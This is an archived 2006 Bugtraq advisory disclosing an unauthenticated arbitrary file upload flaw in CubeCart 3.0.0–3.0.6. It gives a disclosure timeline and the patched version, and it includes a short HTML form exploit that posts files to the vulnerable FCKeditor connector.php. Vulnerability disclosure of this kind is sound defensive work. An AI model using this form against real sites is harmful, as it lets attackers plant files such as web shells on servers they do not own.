lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 24 Feb 2006 00:33:53 +0300
From: NSA Group <vulnerability@...g.ru>
To: bugtraq@...urityfocus.com
Subject: NSA Group Security Advisory NSAG-№197-23.02.2006 Vulnerability CubeCart 3.0.0 – 3.0.6


Advisory:
NSAG-№197-23.02.2006

Research:
NSA Group [Russian company on Audit of safety & Network security]

Site of Research:
http://www.nsag.ru or http://www.nsag.org

Product: 
CubeCart 3.0.0 – 3.0.6

Site of manufacturer:
http://www.cubecart.com

The status: 
19/11/2005 - Publication is postponed. 
19/11/2005 - Manufacturer is notified. 
21/11/2005 - Answer of the manufacturer. 
24/12/2005 - Patch.  
29/12/2005 - New version CubeCart 3.0.7. 
21/02/2006 - Publication of vulnerability.

Original Advisory:
http://www.nsag.ru/vuln/892.html

Risk: 
Critical

Description: 
Vulnerability exists because of insufficient check of authorization of the user 
in the 
script/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php. 
Procedure of authorization include ("../includes/auth.inc.php" is not connected. 
The removed user can by means of specially generated URL to load any files on target 
system. 

Influence: 
Vulnerability allows the removed user loading of any files on system.
 
Exploit: 
<form 
action="http://host/cubedir/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" 
method="POST" enctype="multipart/form-data"> 
File Upload<br> 
<input id="txtFileUpload" type="file" name="NewFile"> 
<br> 
<input type="submit" value="Upload"> 
</form>

Decision:
Download patch or update new version 3.0.7
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!


www.nsag.ru 
«Nemesis» © 2006
------------------------------------ 
Nemesis Security Audit Group © 2006.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ